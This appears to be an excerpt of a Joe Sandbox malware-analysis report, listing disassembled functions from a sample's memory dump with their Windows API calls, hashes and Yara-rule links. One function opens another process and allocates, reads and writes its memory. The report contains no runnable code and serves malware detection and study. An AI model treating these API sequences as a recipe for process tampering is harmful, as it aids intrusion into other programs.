                                                              • String ID:
                                                              • API String ID: 826366716-0
                                                              • Opcode ID: e266712e04f72668b41dc9c4e2bf4fa4bf5d0434607cc53d6eb572ef4414f9ac
                                                              • Instruction ID: 612cb5737b5ac2018f1250312066307ad7b070eab871a332b9902c40ffddee9f
                                                              • Opcode Fuzzy Hash: e266712e04f72668b41dc9c4e2bf4fa4bf5d0434607cc53d6eb572ef4414f9ac
                                                              • Instruction Fuzzy Hash: 0B617F35108242AFD714DF24C4D4E3ABBE5BF84308F14859DF55A8B2A2DB31ED45DB92
                                                              Function 00CBEC27 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CBE60C: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CBD6E2,?), ref: 00CBE629
                                                                • Part of subcall function 00CBE60C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CBD6E2,?), ref: 00CBE642
                                                                • Part of subcall function 00CBE9C5: GetFileAttributesW.KERNELBASE(?,00CBD755), ref: 00CBE9C6
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00CBEC9F
                                                              • MoveFileW.KERNEL32(?,?), ref: 00CBECD8
                                                              • _wcslen.LIBCMT ref: 00CBEE17
                                                              • _wcslen.LIBCMT ref: 00CBEE2F
                                                              • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00CBEE7C
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                              • String ID:
                                                              • API String ID: 3183298772-0
                                                              • Opcode ID: 334993758d4ed2739b2995e3ef2871b386bf10e94091fdadec723a1ce186b16d
                                                              • Instruction ID: 945cb82b8dc7b8f5a8a704829c30883be323f40405b36398b70d81b2d8becae6
                                                              • Opcode Fuzzy Hash: 334993758d4ed2739b2995e3ef2871b386bf10e94091fdadec723a1ce186b16d
                                                              • Instruction Fuzzy Hash: AD5162B24083859BC764EB64D881ADFB7ECAF84710F10492EF599D3152EF70E6888756
                                                              Function 00C823E1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: 16bba88e7eb5654f1bad043698620caa74026603201445fdc53a4604a5cd01b1
                                                              • Instruction ID: cc69c957848dc7c5e9018bc883abd82a5421d1260955cb82ee5d2a3438120c19
                                                              • Opcode Fuzzy Hash: 16bba88e7eb5654f1bad043698620caa74026603201445fdc53a4604a5cd01b1
                                                              • Instruction Fuzzy Hash: FC411772A00204AFDB20EF78C885A5DB7F5EF88318F1581A9E525EB395DB31ED02DB54
                                                              Function 00CC41CE Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetInputState.USER32 ref: 00CC4225
                                                              • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00CC427C
                                                              • TranslateMessage.USER32(?), ref: 00CC42A5
                                                              • DispatchMessageW.USER32(?), ref: 00CC42AF
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CC42C0
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                              • String ID:
                                                              • API String ID: 2256411358-0
                                                              • Opcode ID: cfc5160b28d1b16ac8c5a3c199aba8177b5bdc3df7bf405fc0e391074279deea
                                                              • Instruction ID: 23c02ea557a97f2569d6970a79e481240fccb165c3aea50918f8ef9646d04ee5
                                                              • Opcode Fuzzy Hash: cfc5160b28d1b16ac8c5a3c199aba8177b5bdc3df7bf405fc0e391074279deea
                                                              • Instruction Fuzzy Hash: 5131A670504381AEEB3CCB64D85AFBB77A8EB15305F04856DF472C61A0D7649686CB21
                                                              Function 00CB2191 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 00CB21A5
                                                              • PostMessageW.USER32(00000001,00000201,00000001), ref: 00CB2251
                                                              • Sleep.KERNEL32(00000000,?,?,?), ref: 00CB2259
                                                              • PostMessageW.USER32(00000001,00000202,00000000), ref: 00CB226A
                                                              • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00CB2272
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessagePostSleep$RectWindow
                                                              • String ID:
                                                              • API String ID: 3382505437-0
                                                              • Opcode ID: 4888612ff2d253c47a38c7a59c1bfa25a0dfcce06ee624aa5060553faba3e5f3
                                                              • Instruction ID: dec68a74a2b054fe0a0dd1a95e09ae5a5d3b22182477f86df23273af6cb8d9fb
                                                              • Opcode Fuzzy Hash: 4888612ff2d253c47a38c7a59c1bfa25a0dfcce06ee624aa5060553faba3e5f3
                                                              • Instruction Fuzzy Hash: EF319E71900259EFDB04CFA8CD89BDE3BB5EB14325F104225FA25EB2D0C770AA448B91
                                                              Function 00CE6065 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00CE60A4
                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00CE60FC
                                                              • _wcslen.LIBCMT ref: 00CE610E
                                                              • _wcslen.LIBCMT ref: 00CE6119
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CE6175
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$_wcslen
                                                              • String ID:
                                                              • API String ID: 763830540-0
                                                              • Opcode ID: b3bd2831b1d4fcfb931447b566371bdf21dd7f4644423aee17677450f23446fe
                                                              • Instruction ID: 2b08cbb00e0a8ca6492ab4fd4b862ace9572da2a3cb4e80bd8097b55206deef4
                                                              • Opcode Fuzzy Hash: b3bd2831b1d4fcfb931447b566371bdf21dd7f4644423aee17677450f23446fe
                                                              • Instruction Fuzzy Hash: 6421EA31900298ABDF119FA6CC85AEEBBB8FF14354F108216FA25DB1C5D7709685CF60
                                                              Function 00CB089E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CB07D1,80070057,?,?,?,00CB0BEE), ref: 00CB08BB
                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CB07D1,80070057,?,?), ref: 00CB08D6
                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CB07D1,80070057,?,?), ref: 00CB08E4
                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CB07D1,80070057,?), ref: 00CB08F4
                                                              • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CB07D1,80070057,?,?), ref: 00CB0900
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                              • String ID:
                                                              • API String ID: 3897988419-0
                                                              • Opcode ID: c331c05e212b427936bd8fcfe4a2de425f6fd0367fb9aedbca47c00acc8f3551
                                                              • Instruction ID: 186389b0c001be1b91231ed5a22d91c126e4f044c4ce6167c9081437f3d205dc
                                                              • Opcode Fuzzy Hash: c331c05e212b427936bd8fcfe4a2de425f6fd0367fb9aedbca47c00acc8f3551
                                                              • Instruction Fuzzy Hash: CC014F76A00218AFDB114F65DC48B9F7BBDEB48792F244024F946DA251E772DE409BE0
                                                              Function 00CC0BCB Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNEL32(?,?,?,?,00CC0A39,?,00CC3C56,?,00000001,00C93ACE,?), ref: 00CC0BE0
                                                              • CloseHandle.KERNEL32(?,?,?,?,00CC0A39,?,00CC3C56,?,00000001,00C93ACE,?), ref: 00CC0BED
                                                              • CloseHandle.KERNEL32(?,?,?,?,00CC0A39,?,00CC3C56,?,00000001,00C93ACE,?), ref: 00CC0BFA
                                                              • CloseHandle.KERNEL32(?,?,?,?,00CC0A39,?,00CC3C56,?,00000001,00C93ACE,?), ref: 00CC0C07
                                                              • CloseHandle.KERNEL32(?,?,?,?,00CC0A39,?,00CC3C56,?,00000001,00C93ACE,?), ref: 00CC0C14
                                                              • CloseHandle.KERNEL32(?,?,?,?,00CC0A39,?,00CC3C56,?,00000001,00C93ACE,?), ref: 00CC0C21
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: 6c683e57cfa1278fe6ec92deef3658387a2e6f7679265cb640a9ddd95d77d787
                                                              • Instruction ID: 3e243539fb2b73957bad7a45e2e7e75d307490d1a349d6881cfffef8f51c91b7
                                                              • Opcode Fuzzy Hash: 6c683e57cfa1278fe6ec92deef3658387a2e6f7679265cb640a9ddd95d77d787
                                                              • Instruction Fuzzy Hash: E401A275800B15DFC730AF66D990916FBF9EF503193258A3ED1A252931C771AA45CF80
                                                              Function 00CB64D3 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00CB64E7
                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00CB64FE
                                                              • MessageBeep.USER32(00000000), ref: 00CB6516
                                                              • KillTimer.USER32(?,0000040A), ref: 00CB6532
                                                              • EndDialog.USER32(?,00000001), ref: 00CB654C
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                              • String ID:
                                                              • API String ID: 3741023627-0
                                                              • Opcode ID: 3d3b0f362ca1b794c9b3e923b483a0a0519cacce4e69a48172baff115aa1b344
                                                              • Instruction ID: 13e8393973f76d38fff2f1359c03ba533d513cdcdc8e36a1507ab272868825b5
                                                              • Opcode Fuzzy Hash: 3d3b0f362ca1b794c9b3e923b483a0a0519cacce4e69a48172baff115aa1b344
                                                              • Instruction Fuzzy Hash: 1001A931540708ABEB305B50DD8EBDA777CFF10B05F000559B597650E1DBF4AA98CB50
                                                              Function 00C82630 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 00C8264E
                                                                • Part of subcall function 00C82D58: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8DB71,00D21DC4,00000000,00D21DC4,00000000,?,00C8DB98,00D21DC4,00000007,00D21DC4,?,00C8DF95,00D21DC4), ref: 00C82D6E
                                                                • Part of subcall function 00C82D58: GetLastError.KERNEL32(00D21DC4,?,00C8DB71,00D21DC4,00000000,00D21DC4,00000000,?,00C8DB98,00D21DC4,00000007,00D21DC4,?,00C8DF95,00D21DC4,00D21DC4), ref: 00C82D80
                                                              • _free.LIBCMT ref: 00C82660
                                                              • _free.LIBCMT ref: 00C82673
                                                              • _free.LIBCMT ref: 00C82684
                                                              • _free.LIBCMT ref: 00C82695
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: d4f6ce5bf56d1060281261e87733bbf6618110a037fc1e4496b0b4fbb76e9185
                                                              • Instruction ID: ba654a5f9398580c0e723951ae9379b1651780f14beb7e65faceb8523e2884b1
                                                              • Opcode Fuzzy Hash: d4f6ce5bf56d1060281261e87733bbf6618110a037fc1e4496b0b4fbb76e9185
                                                              • Instruction Fuzzy Hash: A8F0B775841320EBC626BF54BE498983B65BF38765305860BF434D6375CB710943EFA8
                                                              Function 00CB2FA6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CBBCDF: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CB2A60,?,?,00000034,00000800,?,00000034), ref: 00CBBD09
                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00CB2FF0
                                                                • Part of subcall function 00CBBCAA: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CB2A8F,?,?,00000800,?,00001073,00000000,?,?), ref: 00CBBCD4
                                                                • Part of subcall function 00CBBC06: GetWindowThreadProcessId.USER32(?,?), ref: 00CBBC31
                                                                • Part of subcall function 00CBBC06: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00CB2A24,00000034,?,?,00001004,00000000,00000000), ref: 00CBBC41
                                                                • Part of subcall function 00CBBC06: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00CB2A24,00000034,?,?,00001004,00000000,00000000), ref: 00CBBC57
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00CB305D
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00CB30AA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                              • String ID: @
                                                              • API String ID: 4150878124-2766056989
                                                              • Opcode ID: 72a46e2d5a9b8b31ee3683cecf34d7d8fd892d654f5f398db0a6a528d800811f
                                                              • Instruction ID: fb9721fd36b95902952786c9677053473384280d9c890e517c5da9a080bdcce9
                                                              • Opcode Fuzzy Hash: 72a46e2d5a9b8b31ee3683cecf34d7d8fd892d654f5f398db0a6a528d800811f
                                                              • Instruction Fuzzy Hash: 24412C76900228AFDB10EFA4CD85ADEBBB8EF49700F004095FA55B7180DA716F85DB61
                                                              Function 00CBCA3D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00CBCAC6
                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00CBCB0C
                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00D22990,01305E38), ref: 00CBCB55
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Menu$Delete$InfoItem
                                                              • String ID: 0
                                                              • API String ID: 135850232-4108050209
                                                              • Opcode ID: 345238e88fb8c960f5740c8e05c0b863ad4897b013688e8ae0d7ff48ea56cb2e
                                                              • Instruction ID: d1682651a3bf6700afb0d3428b763e36f36e49896d232f8253396a9b6f857614
                                                              • Opcode Fuzzy Hash: 345238e88fb8c960f5740c8e05c0b863ad4897b013688e8ae0d7ff48ea56cb2e
                                                              • Instruction Fuzzy Hash: 4B41BF702053419FD720DF24D8C6F9ABBE8EF84325F14461DF9A697291D730E904CBA2
                                                              Function 00CE4D75 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00CEDCD0,00000000,?,?,?,?), ref: 00CE4E09
                                                              • GetWindowLongW.USER32 ref: 00CE4E26
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CE4E36
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Window$Long
                                                              • String ID: SysTreeView32
                                                              • API String ID: 847901565-1698111956
                                                              • Opcode ID: 9121e06719cb7d7e19230341c3ff261bf8c588b409813a5921fd8bb3c2515a21
                                                              • Instruction ID: aae7922cdc0f6f821afa84456314e39d4a7c3f171ea4006c767e3a5a6840789f
                                                              • Opcode Fuzzy Hash: 9121e06719cb7d7e19230341c3ff261bf8c588b409813a5921fd8bb3c2515a21
                                                              • Instruction Fuzzy Hash: D4319C31100285AFDF258F39DC85BEA7BA9EB48334F244724F879932E0CB34AD919750
                                                              Function 00CE4817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00CE489F
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00CE48B3
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CE48D7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: SysMonthCal32
                                                              • API String ID: 2326795674-1439706946
                                                              • Opcode ID: 8f94c26a727a0327a8fac7669c66a30798925ec2e78f05e00bda09c7ff7b936e
                                                              • Instruction ID: 863a3fa8ceda2f9eac2592035d9398a1ed42215a98691455b3787eeb7e30ea46
                                                              • Opcode Fuzzy Hash: 8f94c26a727a0327a8fac7669c66a30798925ec2e78f05e00bda09c7ff7b936e
                                                              • Instruction Fuzzy Hash: BD21D132600258BFDF258F90CC86FEE3B69EF48714F110214FA15AB1D0D6B5A895DBA0
                                                              Function 00CE4FB2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00CE5064
                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00CE5072
                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00CE5079
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$DestroyWindow
                                                              • String ID: msctls_updown32
                                                              • API String ID: 4014797782-2298589950
                                                              • Opcode ID: 3f4d7755483be75e9f76dd976494a5b48c366974770c6a82634d55cdef273a29
                                                              • Instruction ID: d88b3ef22fc8e767ed2ec989ae5dd652326d4f445bcb50bc5440192bd3c3399b
                                                              • Opcode Fuzzy Hash: 3f4d7755483be75e9f76dd976494a5b48c366974770c6a82634d55cdef273a29
                                                              • Instruction Fuzzy Hash: F721AEB5600248AFDB10DF24DCC1DBA37ACEF5A3A8B000519F9119B361CA30ED429BA0
